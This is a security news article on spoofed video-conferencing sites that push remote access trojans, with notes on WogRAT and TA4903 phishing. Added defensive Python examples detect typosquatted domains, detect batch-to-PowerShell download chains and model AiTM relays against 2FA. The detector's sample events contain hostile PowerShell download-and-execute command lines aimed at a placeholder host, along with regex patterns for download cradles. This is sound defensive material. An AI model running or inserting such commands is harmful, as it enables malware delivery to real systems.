Watch Out for Spoofed Zoom, Skype, Google Meet Websites Delivering Malware


Threat actors have been using fake websites advertising popular video conferencing software such as Google Meet, Skype, and Zoom to deliver a variety of malware targeting both Android and Windows users since December 2023.

“The threat actor is distributing Remote Access Trojans (RATs) including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows systems,” Zscaler ThreatLabz researchers said.

The spoofed sites are in Russian and are hosted on domains that closely resemble their legitimate counterparts, indicating that the attackers are using typosquatting techniques to lure potential victims into downloading the malware.
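The following is an added illustration of how a defender can triage newly observed hostnames for the kind of lookalike domain described above; it is not code from the Zscaler report or from any vendor tool. The brand list and the homoglyph table are small hand-picked subsets, and every sample domain in it is constructed for illustration; none of them is claimed to be a domain actually used in this campaign.

```python
"""Triage heuristic for lookalike (typosquatted) video-conferencing domains.

Added illustration, not from the Zscaler report or any vendor tool. The brand
list and homoglyph table are small hand-picked subsets, and every sample domain
below is constructed; none is claimed to be a domain used in the campaign.
"""
import unicodedata

# Legitimate host -> brand tokens an impostor is likely to embed in its own name.
BRANDS = {
    "zoom.us": ("zoom",),
    "skype.com": ("skype",),
    "meet.google.com": ("googlemeet", "meetgoogle"),
}

# Substitutions commonly used to imitate Latin letters (subset): letter pairs
# that render like one letter, look-alike digits, and Cyrillic homoglyphs.
HOMOGLYPHS = {
    "rn": "m", "vv": "w",
    "0": "o", "1": "l", "3": "e", "5": "s",
    "\u043e": "o", "\u0430": "a", "\u0435": "e", "\u0441": "c", "\u0440": "p",
}


def normalize(host: str) -> str:
    """Lower-case, NFKC-fold and undo the substitutions in HOMOGLYPHS."""
    host = unicodedata.normalize("NFKC", host.lower())
    # Longer sequences ("rn") first so single-character rules cannot split them.
    for src, dst in sorted(HOMOGLYPHS.items(), key=lambda kv: -len(kv[0])):
        host = host.replace(src, dst)
    return host


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; labels are short, so O(len(a)*len(b)) is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(candidate: str, max_distance: int = 1):
    """Return None for a legitimate host (or one of its subdomains); otherwise a
    dict naming the impersonated brand and why the candidate was flagged."""
    host = candidate.lower().rstrip(".")
    for legit in BRANDS:
        if host == legit or host.endswith("." + legit):
            return None
    labels = normalize(host).split(".")
    # Label directly under the TLD, hyphens dropped: "skype-download.com" -> "skypedownload".
    compact = (labels[-2] if len(labels) >= 2 else labels[0]).replace("-", "")
    for legit, tokens in BRANDS.items():
        for token in tokens:
            if token in compact:
                return {"candidate": candidate, "target": legit, "reason": "brand token embedded"}
            dist = levenshtein(compact, token)
            if dist <= max_distance:
                return {"candidate": candidate, "target": legit, "reason": f"edit distance {dist}"}
    return None


if __name__ == "__main__":
    # Constructed sample: hostnames as they might arrive from a passive-DNS or CT-log feed.
    samples = ["zoom.us", "us04web.zoom.us", "zoorn.us", "zooom.us",
               "skype-download.com", "meet-google-app.com", "z\u043e\u043em.us", "example.com"]
    for name in samples:
        print(f"{name:24} {classify(name) or 'ok'}")
```

The legitimacy check runs on the raw hostname, so only an exact match or a true subdomain of a known-good host is excused; everything else is folded and compared. Treat the output as a triage queue rather than a verdict: a four-letter brand token with edit distance 1 and digit folding will also catch unrelated names, so pair it with an allowlist and registrar or certificate data before acting on a hit.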


They also include options to download the app for Android, iOS, and Windows platforms. While clicking on the button for Android downloads an APK file, clicking on the Windows app button triggers the download of a batch script.

The malicious batch script is responsible for executing a PowerShell script, which, in turn, downloads and executes the remote access trojan.
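The batch-file to PowerShell to download-and-execute chain just described leaves a recognisable process lineage in endpoint telemetry. The following is an added example of detection logic for it, run over constructed Sysmon-style process-creation events; it is not taken from the Zscaler analysis, and the indicator lists, file names and `.invalid` URLs in it are assumptions made for illustration.

```python
"""Flag the batch-file -> PowerShell -> download-and-execute chain in process
creation telemetry.

Added example; the detection logic and the Sysmon-style events it runs over are
constructed for illustration, not taken from the Zscaler analysis. Field names
(Image, ParentImage, CommandLine, ParentCommandLine) follow Sysmon event ID 1.
"""
import base64
import re

POWERSHELL = ("powershell.exe", "pwsh.exe")

# Common PowerShell download cradles: object/cmdlet names plus their aliases.
CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|net\.webclient|"
    r"downloadstring|downloadfile|start-bitstransfer|invoke-expression|\biex\b",
    re.IGNORECASE,
)
# Flags that hide the window or disable policy/profile, typical of droppers.
EVASION = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-nop\b|-noni\b",
    re.IGNORECASE,
)
# -EncodedCommand and its abbreviations, followed by the base64 payload.
ENCODED = re.compile(r"-(encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
BATCH = re.compile(r"\.(bat|cmd)\b", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(event: dict) -> dict:
    """Score one process-creation event. Suspicious when a download cradle is
    present together with at least one more indicator (batch parent, evasion
    flags or an encoded command)."""
    image = event["Image"].lower().rsplit("\\", 1)[-1]
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    reasons = []
    if image in POWERSHELL:
        cmd = event["CommandLine"]
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            reasons.append("encoded command")
        # Look for cradles in the visible command line and in the decoded payload.
        if CRADLE.search(cmd + "\n" + (decoded or "")):
            reasons.append("download cradle")
        if EVASION.search(cmd):
            reasons.append("evasion flags")
        if parent == "cmd.exe" and BATCH.search(event.get("ParentCommandLine", "")):
            reasons.append("launched by batch script")
    suspicious = "download cradle" in reasons and len(reasons) >= 2
    return {"suspicious": suspicious, "reasons": reasons}


def sample_events():
    """Constructed events (not real telemetry); URLs use the reserved .invalid TLD."""
    stage2 = ("Invoke-WebRequest -Uri http://example.invalid/update.exe "
              "-OutFile $env:TEMP\\update.exe; Start-Process $env:TEMP\\update.exe")
    encoded = base64.b64encode(stage2.encode("utf-16le")).decode()
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    return [
        {   # benign: scheduled maintenance script
            "ParentImage": r"C:\Windows\System32\svchost.exe",
            "ParentCommandLine": "svchost.exe -k netsvcs -p -s Schedule",
            "Image": ps,
            "CommandLine": r"powershell.exe -File C:\Scripts\cleanup.ps1",
        },
        {   # the chain from the article: batch file -> PowerShell -> remote script
            "ParentImage": r"C:\Windows\System32\cmd.exe",
            "ParentCommandLine": r'cmd.exe /c "C:\Users\user\Downloads\Skype-Setup.bat"',
            "Image": ps,
            "CommandLine": ('powershell.exe -w hidden -ep bypass -c "IEX '
                            "((New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1'))\""),
        },
        {   # same chain with the payload hidden behind -EncodedCommand
            "ParentImage": r"C:\Windows\System32\cmd.exe",
            "ParentCommandLine": r"cmd.exe /c C:\Users\user\Downloads\Zoom-Setup.bat",
            "Image": ps,
            "CommandLine": f"powershell.exe -nop -w hidden -enc {encoded}",
        },
    ]


if __name__ == "__main__":
    for ev in sample_events():
        print(assess(ev), "<-", ev["CommandLine"][:60])
```

Decoding `-EncodedCommand` before matching matters: the cradle in the third event is invisible in the raw command line. Requiring two indicators keeps an administrator's interactive `iwr` from firing, but the threshold is a tuning choice, and a real rule would also key on the batch file having been written by a browser moments earlier.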

Currently, there is no evidence that the threat actor is targeting iOS users, given that clicking on the button for the iOS app takes the user to the legitimate Apple App Store listing for Skype.

“A threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files,” the researchers said.

The development comes as the AhnLab Security Intelligence Center (ASEC) revealed that a new malware dubbed WogRAT, targeting both Windows and Linux, is abusing a free online notepad platform called aNotepad as a covert vector for hosting and retrieving malicious code.


It is said to have been active since at least late 2022, targeting Asian countries such as China, Hong Kong, Japan, and Singapore, among others. That said, it is currently not known how the malware is distributed in the wild.

“When WogRAT is run for the first time, it collects basic information of the infected system and sends them to the C&C server,” ASEC said. “The malware then supports commands such as executing commands, sending results, downloading files, and uploading these files.”

It also coincides with high-volume phishing campaigns orchestrated by a financially motivated cybercriminal actor known as TA4903 to steal corporate credentials and likely follow them with business email compromise (BEC) attacks. The adversary has been active since at least 2019, with the activity intensifying after mid-2023.

“TA4903 routinely conducts campaigns spoofing various U.S. government entities to steal corporate credentials,” Proofpoint said. “The actor also spoofs organizations in various sectors including construction, finance, healthcare, food and beverage, and others.”


Attack chains involve the use of QR codes (aka quishing) for credential phishing as well as the EvilProxy adversary-in-the-middle (AiTM) phishing kit to bypass two-factor authentication (2FA) protections.
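An AiTM kit bypasses 2FA not by breaking the second factor but by relaying it: the victim enters a valid password and one-time code into the proxy page, the proxy forwards both to the real site in real time, and the session token comes back to the attacker. The following added illustration models that exchange and contrasts it with an origin-bound (WebAuthn-style) login, which the same relay cannot complete. It is not code from EvilProxy or from the Proofpoint report; the relying party, proxy and authenticator are toy models, a keyed HMAC stands in for the public-key signature a real authenticator produces, and the origins, password and secrets are constructed.

```python
"""Why an AiTM phishing proxy defeats OTP-style 2FA but not an origin-bound
authenticator.

Added illustration, not code from EvilProxy or from the Proofpoint report. The
relying party, proxy and authenticator are toy models; a keyed HMAC stands in
for the public-key signature a real WebAuthn authenticator produces, and the
origins, password and secrets are constructed.
"""
import hashlib
import hmac
import json
import secrets
import struct

REAL_ORIGIN = "https://mail.example"           # where the victim thinks they are
PHISH_ORIGIN = "https://mail-example.invalid"  # the proxy's own origin


def totp(secret: bytes, now: int, step: int = 30) -> str:
    """RFC 6238 TOTP, SHA-1, six digits."""
    counter = struct.pack(">Q", now // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % 1_000_000
    return f"{code:06d}"


def sign_client_data(device_key: bytes, client_data: dict) -> bytes:
    """Stand-in for the authenticator's signature over clientDataJSON."""
    payload = json.dumps(client_data, sort_keys=True).encode()
    return hmac.new(device_key, payload, hashlib.sha256).digest()


class RelyingParty:
    """Toy account service offering password+TOTP and an origin-bound login."""

    def __init__(self):
        self.password = "hunter2"                  # constructed victim credential
        self.totp_secret = secrets.token_bytes(20)
        self.device_key = secrets.token_bytes(32)  # models the registered device key
        self.sessions = set()

    def _issue_session(self) -> str:
        token = secrets.token_hex(16)
        self.sessions.add(token)
        return token

    def login_totp(self, password: str, code: str, now: int):
        """Nothing here ties the OTP to the page where the user typed it."""
        if password == self.password and hmac.compare_digest(code, totp(self.totp_secret, now)):
            return self._issue_session()
        return None

    def challenge(self) -> str:
        return secrets.token_hex(16)

    def login_webauthn(self, challenge: str, client_data: dict, signature: bytes):
        """Accept only a fresh challenge signed for this site's own origin."""
        if not hmac.compare_digest(sign_client_data(self.device_key, client_data), signature):
            return None
        if client_data["challenge"] != challenge or client_data["origin"] != REAL_ORIGIN:
            return None
        return self._issue_session()


def browser_assertion(device_key: bytes, challenge: str, page_origin: str):
    """The browser, not the user, fills in the origin of the page requesting the
    assertion (a real browser would already refuse for a non-matching rpId)."""
    client_data = {"challenge": challenge, "origin": page_origin}
    return client_data, sign_client_data(device_key, client_data)


def aitm_against_totp(rp: RelyingParty, now: int):
    """Victim types password + current OTP into the proxy page; the proxy
    relays both to the real site and keeps the session token it gets back."""
    relayed_password, relayed_code = rp.password, totp(rp.totp_secret, now)
    return rp.login_totp(relayed_password, relayed_code, now)


def aitm_against_webauthn(rp: RelyingParty):
    """Proxy relays a genuine challenge, but the victim's browser is on
    PHISH_ORIGIN, so the assertion names the wrong origin and is rejected."""
    challenge = rp.challenge()
    client_data, sig = browser_assertion(rp.device_key, challenge, PHISH_ORIGIN)
    return rp.login_webauthn(challenge, client_data, sig)


def legitimate_webauthn(rp: RelyingParty):
    """Same flow from the real site: the origin matches and login succeeds."""
    challenge = rp.challenge()
    client_data, sig = browser_assertion(rp.device_key, challenge, REAL_ORIGIN)
    return rp.login_webauthn(challenge, client_data, sig)


if __name__ == "__main__":
    rp = RelyingParty()
    print("AiTM vs TOTP     ->", "session stolen" if aitm_against_totp(rp, 1_700_000_000) else "blocked")
    print("AiTM vs WebAuthn ->", "session stolen" if aitm_against_webauthn(rp) else "blocked")
    print("legit WebAuthn   ->", "ok" if legitimate_webauthn(rp) else "failed")
```

The practical takeaway is that the OTP (and equally a push approval) is correct and fresh, so the relying party cannot tell it was relayed; only a factor that carries the origin inside the signed data gives the server something to reject. On the detection side, a session issued to an IP and device the user has never used, immediately after a successful 2FA login, is the trace this relay leaves.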

Once a target mailbox is compromised, the threat actor has been observed searching for information related to payments, invoices, and bank details, with the ultimate goal of hijacking existing email threads and carrying out invoice fraud.

Phishing campaigns have also functioned as a conduit for other malware families such as DarkGate, Agent Tesla, and Remcos RAT, the last of which uses steganographic decoys to drop the malware on compromised hosts.
